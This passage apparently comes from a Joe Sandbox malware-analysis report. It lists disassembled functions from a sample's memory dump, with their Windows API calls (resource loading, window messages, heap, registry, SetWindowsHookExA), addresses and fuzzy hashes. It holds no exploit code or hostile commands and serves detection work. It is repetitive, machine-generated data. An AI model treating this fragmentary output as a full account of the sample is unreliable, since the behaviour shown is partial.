                                • Instruction Fuzzy Hash: F0413331600608ABEB108F25CC8A7EEB764EB04315F10C56BFD16D62D1CB7CC9898BA8
                                Function 004021B0 Relevance: 4.6, APIs: 3, Instructions: 94COMMON
                                Download Yara Rule
                                APIs
                                • FindResourceA.KERNEL32(00000000,?,00000006), ref: 004021CA
                                  • Part of subcall function 00401180: LoadResource.KERNEL32(00000104,?,?,00000000,0040120C,?,00000000,?,?,00000006,00000000,?,0045A3DC,?,?,?), ref: 0040118C
                                • WideCharToMultiByte.KERNEL32(00000000,?,0000007A,?,80070057), ref: 00402207
                                • WideCharToMultiByte.KERNEL32(00000000,?,0000007A,?,80070057), ref: 00402245
                                Memory Dump Source
                                • Source File: 00000005.00000002.3254378058.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000005.00000002.3248452524.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254750478.0000000000465000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254793489.00000000004D5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.00000000004DB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.00000000004E7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.000000000051D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.0000000000521000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.000000000052F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_400000_ .jbxd
                                Similarity
                                • API ID: ByteCharMultiResourceWide$FindLoad
                                • String ID:
                                • API String ID: 861045882-0
                                • Opcode ID: baa4575744bcffb4867a31880af86c8239e7816c7f4c7781bfc20bb34485b732
                                • Instruction ID: 4a0254a43c1e3588e48c1e462ee64abe08c7cd62e9e1b92a79ad5815ace06fc1
                                • Opcode Fuzzy Hash: baa4575744bcffb4867a31880af86c8239e7816c7f4c7781bfc20bb34485b732
                                • Instruction Fuzzy Hash: 9B21D4323016106FD7109B69DC8DF2B77ACEB49B55F10406EF541EB2D0DAB8A801C7A5
                                Function 0045B632 Relevance: 4.5, APIs: 3, Instructions: 36windowCOMMON
                                Download Yara Rule
                                APIs
                                • KiUserCallbackDispatcher.NTDLL(00000030,00000000,00000000,00000000), ref: 0045B600
                                • TranslateMessage.USER32(00000030), ref: 0045B61F
                                • DispatchMessageA.USER32(00000030), ref: 0045B626
                                Memory Dump Source
                                • Source File: 00000005.00000002.3254378058.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000005.00000002.3248452524.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254750478.0000000000465000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254793489.00000000004D5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.00000000004DB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.00000000004E7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.000000000051D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.0000000000521000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.000000000052F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_400000_ .jbxd
                                Similarity
                                • API ID: Message$CallbackDispatchDispatcherTranslateUser
                                • String ID:
                                • API String ID: 2960505505-0
                                • Opcode ID: b4a6a35ade7ed14936ff1922dd7b31983e8294f2af7dbd9086ee59b7b801dfec
                                • Instruction ID: 06f4cbef7ab207f2fff16cb34858fb85fe973bf41392bcce92dd4f4ecb0072a7
                                • Opcode Fuzzy Hash: b4a6a35ade7ed14936ff1922dd7b31983e8294f2af7dbd9086ee59b7b801dfec
                                • Instruction Fuzzy Hash: 93F05E71211851AFA7156B319C089BF76ACEF0135BB05406BF801C6212EB68CD468AEF
                                Function 0045613C Relevance: 4.5, APIs: 3, Instructions: 35COMMON
                                Download Yara Rule
                                APIs
                                • FindResourceA.KERNEL32(?,?,00000005), ref: 00456168
                                • LoadResource.KERNEL32(?,00000000), ref: 00456170
                                • FreeResource.KERNEL32(00000000), ref: 00456188
                                Memory Dump Source
                                • Source File: 00000005.00000002.3254378058.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000005.00000002.3248452524.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254750478.0000000000465000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254793489.00000000004D5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.00000000004DB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.00000000004E7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.000000000051D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.0000000000521000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.000000000052F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_400000_ .jbxd
                                Similarity
                                • API ID: Resource$FindFreeLoad
                                • String ID:
                                • API String ID: 934874419-0
                                • Opcode ID: ab0f40a6e43c0a41c589bfbde39cb591226471d23c8e9bd6ba915b6870995341
                                • Instruction ID: fccebd9682a858cdeb5031e85e51eaab4cad9e1c6797173475c662a524fb5943
                                • Opcode Fuzzy Hash: ab0f40a6e43c0a41c589bfbde39cb591226471d23c8e9bd6ba915b6870995341
                                • Instruction Fuzzy Hash: 0AF05471601B11ABC7105B659C88EABFB9CFF59366F45002AF944C3312D77898048AA9
                                Function 0042EFA0 Relevance: 3.1, APIs: 2, Instructions: 57windowCOMMON
                                Download Yara Rule
                                APIs
                                • SendMessageA.USER32(?,0000014B,00000000,00000000), ref: 0042EFD4
                                • SendMessageA.USER32(?,00000143,00000000,?), ref: 0042F03E
                                Memory Dump Source
                                • Source File: 00000005.00000002.3254378058.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000005.00000002.3248452524.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254750478.0000000000465000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254793489.00000000004D5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.00000000004DB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.00000000004E7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.000000000051D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.0000000000521000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.000000000052F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_400000_ .jbxd
                                Similarity
                                • API ID: MessageSend
                                • String ID:
                                • API String ID: 3850602802-0
                                • Opcode ID: e11a1a5f31f4cb33b024c01f2dbf4c1542a7e5af66afb4619ba965c6068a4425
                                • Instruction ID: cfda056f3e1bfb89349e09b922290d6e6db6a01bb08bf723edffdc8e6ae5ea85
                                • Opcode Fuzzy Hash: e11a1a5f31f4cb33b024c01f2dbf4c1542a7e5af66afb4619ba965c6068a4425
                                • Instruction Fuzzy Hash: 4C110A71204750ABC310DF59D880F97B7E8FB48B14F80063EF46497681D738E8058BA6
                                Function 00457CE7 Relevance: 3.0, APIs: 2, Instructions: 44COMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 0045982D: GetWindowLongA.USER32(?,000000F0), ref: 00459838
                                • GetWindowRect.USER32(?,?), ref: 00457D0C
                                • GetWindow.USER32(?,00000004), ref: 00457D29
                                  • Part of subcall function 00459926: IsWindowEnabled.USER32(?), ref: 0045992F
                                Memory Dump Source
                                • Source File: 00000005.00000002.3254378058.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000005.00000002.3248452524.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254750478.0000000000465000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254793489.00000000004D5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.00000000004DB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.00000000004E7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.000000000051D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.0000000000521000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.000000000052F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_400000_ .jbxd
                                Similarity
                                • API ID: Window$EnabledLongRect
                                • String ID:
                                • API String ID: 3170195891-0
                                • Opcode ID: e782368540316d1cacdbfc55745b2c3869e6f7dbff5383a13291f65101c725e8
                                • Instruction ID: 375d3ee3df655b8212e251599233aac5bdcbf11d9cda8cb0e33f1c270f2b4009
                                • Opcode Fuzzy Hash: e782368540316d1cacdbfc55745b2c3869e6f7dbff5383a13291f65101c725e8
                                • Instruction Fuzzy Hash: 3101A7316046089BDF14EF25E855BBF77B5AF05306F00446AED02973A3DB78DD0D8A58
                                Function 00447CA5 Relevance: 3.0, APIs: 2, Instructions: 35memoryCOMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                • __lock.LIBCMT ref: 00447CC3
                                  • Part of subcall function 0044D832: EnterCriticalSection.KERNEL32(?,?,?,00447CC8,00000004,004CAFC8,0000000C,0044D74B,00000000,?,0044ABA0,?,004CAFF8,00000060), ref: 0044D85A
                                • RtlFreeHeap.NTDLL(00000000,?,004CAFC8,0000000C,0044D74B,00000000,?,0044ABA0,?,004CAFF8,00000060), ref: 00447D0A
                                Memory Dump Source
                                • Source File: 00000005.00000002.3254378058.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000005.00000002.3248452524.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254750478.0000000000465000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254793489.00000000004D5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.00000000004DB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.00000000004E7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.000000000051D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.0000000000521000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.000000000052F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_400000_ .jbxd
                                Similarity
                                • API ID: CriticalEnterFreeHeapSection__lock
                                • String ID:
                                • API String ID: 3012239193-0
                                • Opcode ID: ac1540a0b851fcdb40e3e79ba1efe0328e53520ba3295f022b908cb1df8d684a
                                • Instruction ID: d955b6addba1c6b7a19bfec433c3d98e9b43adaac541c227c5d3499d9416ad9c
                                • Opcode Fuzzy Hash: ac1540a0b851fcdb40e3e79ba1efe0328e53520ba3295f022b908cb1df8d684a
                                • Instruction Fuzzy Hash: 96F0B471D16315AAFF207B62AC07B6F7B60AF00769F20412FF410652D1CB7C5A52DA9D
                                Function 00447E08 Relevance: 3.0, APIs: 2, Instructions: 34memoryCOMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                • __lock.LIBCMT ref: 00447E2A
                                  • Part of subcall function 0044D832: EnterCriticalSection.KERNEL32(?,?,?,00447CC8,00000004,004CAFC8,0000000C,0044D74B,00000000,?,0044ABA0,?,004CAFF8,00000060), ref: 0044D85A
                                • RtlAllocateHeap.NTDLL(00000000,?,004CAFE8,0000000C,00447E93,000000E0,00447EBE,?,0044D7B5,00000018,004CBC70,00000008,0044D84B,?,?), ref: 00447E6B
                                Memory Dump Source
                                • Source File: 00000005.00000002.3254378058.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000005.00000002.3248452524.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254750478.0000000000465000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254793489.00000000004D5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.00000000004DB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.00000000004E7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.000000000051D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.0000000000521000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.000000000052F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_400000_ .jbxd
                                Similarity
                                • API ID: AllocateCriticalEnterHeapSection__lock
                                • String ID:
                                • API String ID: 409319249-0
                                • Opcode ID: c04b9e8e06a6364d5c1f494db0ccfd713c89f64cbde72ec4706e017656008a0b
                                • Instruction ID: f1a8fd19c40bd1083452c9b815fd926fceb10cfad15d11fd48909767391a0784
                                • Opcode Fuzzy Hash: c04b9e8e06a6364d5c1f494db0ccfd713c89f64cbde72ec4706e017656008a0b
                                • Instruction Fuzzy Hash: 31F0CD32D416249AFB20BB759E0675F7760BB10728F30436BE8202A3E1C73C1D52CA8E
                                Function 0045DD12 Relevance: 3.0, APIs: 2, Instructions: 33COMMON
                                Download Yara Rule
                                APIs
                                • GetWindowTextLengthA.USER32(00000000), ref: 0045DD2C
                                • GetWindowTextA.USER32(00000000,00000000,00000000), ref: 0045DD41
                                Memory Dump Source
                                • Source File: 00000005.00000002.3254378058.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000005.00000002.3248452524.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254750478.0000000000465000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254793489.00000000004D5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.00000000004DB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.00000000004E7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.000000000051D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.0000000000521000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.000000000052F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_400000_ .jbxd
                                Similarity
                                • API ID: TextWindow$Length
                                • String ID:
                                • API String ID: 1006428111-0
                                • Opcode ID: 720720b7826cd516c124d1c9f667a6bb5a0a754d63c71446cbaca4b57f6d7706
                                • Instruction ID: 3df95a50f7c5756162ba1c81e646130b5dca14df09544dfd3e809bef63806a36
                                • Opcode Fuzzy Hash: 720720b7826cd516c124d1c9f667a6bb5a0a754d63c71446cbaca4b57f6d7706
                                • Instruction Fuzzy Hash: 59F0E932100105EBCB20AF51DC04DAF772DEF49362F04011AFD1547151DB385415CBA9
                                Function 004305C0 Relevance: 3.0, APIs: 2, Instructions: 32registryCOMMON
                                Download Yara Rule
                                APIs
                                • RegQueryValueExA.KERNEL32(00000000,?,00000000,00000000,?,80000002,?,?,?,0043062F,80000002,00000000,?,00402EF7), ref: 004305EC
                                • GetLastError.KERNEL32(?,?,0043062F,80000002,00000000,?,00402EF7), ref: 004305F9
                                Memory Dump Source
                                • Source File: 00000005.00000002.3254378058.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000005.00000002.3248452524.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254750478.0000000000465000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254793489.00000000004D5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.00000000004DB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.00000000004E7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.000000000051D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.0000000000521000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.000000000052F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_400000_ .jbxd
                                Similarity
                                • API ID: ErrorLastQueryValue
                                • String ID:
                                • API String ID: 1349404517-0
                                • Opcode ID: 4b12fa7677ebd328b7f12a0ba8178812c3b22382074bc9e6808d752de9ad009f
                                • Instruction ID: fe9462d29a9da7b837a2406539751575587682de2b60d7ac772098d07a0583a7
                                • Opcode Fuzzy Hash: 4b12fa7677ebd328b7f12a0ba8178812c3b22382074bc9e6808d752de9ad009f
                                • Instruction Fuzzy Hash: 0FF01C722042116BD314CB58EC04F5BB7E8EBD8B51F10822EFA86D7280DBA0991587A9
                                Function 00456289 Relevance: 3.0, APIs: 2, Instructions: 27COMMON
                                Download Yara Rule
                                APIs
                                • DefWindowProcA.USER32(?,?,?,?), ref: 004562B0
                                • CallWindowProcA.USER32(?,?,?,?,?), ref: 004562C5
                                Memory Dump Source
                                • Source File: 00000005.00000002.3254378058.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000005.00000002.3248452524.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254750478.0000000000465000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254793489.00000000004D5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.00000000004DB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.00000000004E7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.000000000051D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.0000000000521000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.000000000052F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_400000_ .jbxd
                                Similarity
                                • API ID: ProcWindow$Call
                                • String ID:
                                • API String ID: 2316559721-0
                                • Opcode ID: 7c14ae1876ad108138e0c2b43aed3fef796ce7489ec108068f17dd744e4f0651
                                • Instruction ID: 724d7a8fdadb4652615dbb9f4325778996f429c979f1ed0c0a89b8764ad68d23
                                • Opcode Fuzzy Hash: 7c14ae1876ad108138e0c2b43aed3fef796ce7489ec108068f17dd744e4f0651
                                • Instruction Fuzzy Hash: 2FF01C36100605FFCF215F95DC04D9A7BB9FF08352F418469F90987631D776E824AB54
                                Function 0044D68E Relevance: 3.0, APIs: 2, Instructions: 26memoryCOMMON
                                Download Yara Rule
                                APIs
                                • HeapCreate.KERNEL32(00000000,00001000,00000000,004481DD,00000001,?,004CAFF8,00000060), ref: 0044D69F
                                  • Part of subcall function 0044D863: HeapAlloc.KERNEL32(00000000,00000140,0044D6C7,000003F8,?,004CAFF8,00000060), ref: 0044D870
                                • HeapDestroy.KERNEL32(?,004CAFF8,00000060), ref: 0044D6D2
                                Memory Dump Source
                                • Source File: 00000005.00000002.3254378058.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000005.00000002.3248452524.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254750478.0000000000465000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254793489.00000000004D5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.00000000004DB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.00000000004E7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.000000000051D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.0000000000521000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.000000000052F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_400000_ .jbxd
                                Similarity
                                • API ID: Heap$AllocCreateDestroy
                                • String ID:
                                • API String ID: 2236781399-0
                                • Opcode ID: bcabe9e55bb853ce9606875af35cc23512099b3aa20cb19af125bf1c2520e8ce
                                • Instruction ID: 75e7420880b69f34e065517e2ae9d8fd4c88d18d1bcf8fff13bf1802494dd5c5
                                • Opcode Fuzzy Hash: bcabe9e55bb853ce9606875af35cc23512099b3aa20cb19af125bf1c2520e8ce
                                • Instruction Fuzzy Hash: F1E0D871E113006BFB006F357E0832637D49B45345F014937F405D5294FB748410DA0E
                                Function 00458AD3 Relevance: 3.0, APIs: 2, Instructions: 25threadCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00460C65: __EH_prolog.LIBCMT ref: 00460C6A
                                • GetCurrentThreadId.KERNEL32 ref: 00458AF5
                                • SetWindowsHookExA.USER32(00000005,Function_000588B4,00000000,00000000), ref: 00458B05
                                Memory Dump Source
                                • Source File: 00000005.00000002.3254378058.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000005.00000002.3248452524.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254750478.0000000000465000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254793489.00000000004D5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.00000000004DB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.00000000004E7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.000000000051D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.0000000000521000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.000000000052F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_400000_ .jbxd
                                Similarity
                                • API ID: CurrentH_prologHookThreadWindows
                                • String ID:
                                • API String ID: 2183259885-0
                                • Opcode ID: f41d2774eea753fce7038d8cf1bba76ec0a83b13827fae0ef50e3a3f985bd47e
                                • Instruction ID: 5f91b5a6e92888a10516239ab813794ae4ba7b6c56ba3dc280b3d2880adb0640
                                • Opcode Fuzzy Hash: f41d2774eea753fce7038d8cf1bba76ec0a83b13827fae0ef50e3a3f985bd47e
                                • Instruction Fuzzy Hash: FAE09B717407009BD2306F125C0971776A8DBC4B27F10453FF945AA245DE74684CC67F
                                Function 004306A0 Relevance: 3.0, APIs: 2, Instructions: 17registryCOMMON
                                Download Yara Rule
                                APIs
                                • RegOpenKeyExA.KERNEL32(80000002,80000002,00000000,000F003F,?,?,00402ED4,80000002,SOFTWARE\Microsoft\Internet Explorer\Registration), ref: 004306B5
                                • GetLastError.KERNEL32(?,00402ED4,80000002,SOFTWARE\Microsoft\Internet Explorer\Registration), ref: 004306BF
                                Memory Dump Source
                                • Source File: 00000005.00000002.3254378058.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000005.00000002.3248452524.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254750478.0000000000465000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254793489.00000000004D5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.00000000004DB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.00000000004E7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.000000000051D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.0000000000521000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.000000000052F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_400000_ .jbxd
                                Similarity
                                • API ID: ErrorLastOpen
                                • String ID:
                                • API String ID: 3359735512-0
                                • Opcode ID: 35defb75280334056dcad91695dd74def03daa0eb104eab090d3a280f410746c
                                • Instruction ID: d694ad6d0416bea9128f64c78c3a1527c4c8503895f06f341b73c71a9d6b33f9
                                • Opcode Fuzzy Hash: 35defb75280334056dcad91695dd74def03daa0eb104eab090d3a280f410746c
                                • Instruction Fuzzy Hash: 7CD05E313057107BC3749B58EC04FA7BBD8EB88B80F00842AFA49C3250DAB0D840CBB5
                                Function 0045B7C6 Relevance: 3.0, APIs: 2, Instructions: 15threadCOMMON
                                Download Yara Rule
                                APIs
                                • GetCurrentThreadId.KERNEL32 ref: 0045B7D9
                                • SetWindowsHookExA.USER32(000000FF,0045B648,00000000,00000000), ref: 0045B7E9
                                Memory Dump Source
                                • Source File: 00000005.00000002.3254378058.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000005.00000002.3248452524.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254750478.0000000000465000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254793489.00000000004D5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.00000000004DB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.00000000004E7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.000000000051D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.0000000000521000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.000000000052F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_400000_ .jbxd
                                Similarity
                                • API ID: CurrentHookThreadWindows
                                • String ID:
                                • API String ID: 1904029216-0
                                • Opcode ID: caa397c9cf1992df8d3d644f132b9f788036187670f4d340d85928ce480f1793
                                • Instruction ID: e7a0d55e888616423550d49620b794bcb0c811eaca6d3862d66bd71e3f1928a1
                                • Opcode Fuzzy Hash: caa397c9cf1992df8d3d644f132b9f788036187670f4d340d85928ce480f1793
                                • Instruction Fuzzy Hash: B1D0A7314456506EE71027717C0DB9E3A50DB05326F150397F811551D2EB6845448B9F
                                Function 0043A5F0 Relevance: 1.6, APIs: 1, Instructions: 78windowCOMMON
                                Download Yara Rule
                                APIs
                                • LoadIconA.USER32(?,00000080), ref: 0043A722
                                Memory Dump Source
                                • Source File: 00000005.00000002.3254378058.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000005.00000002.3248452524.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254750478.0000000000465000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254793489.00000000004D5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.00000000004DB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.00000000004E7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.000000000051D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.0000000000521000.00000002.00000001.01000000.00000007.sdmpDownload File
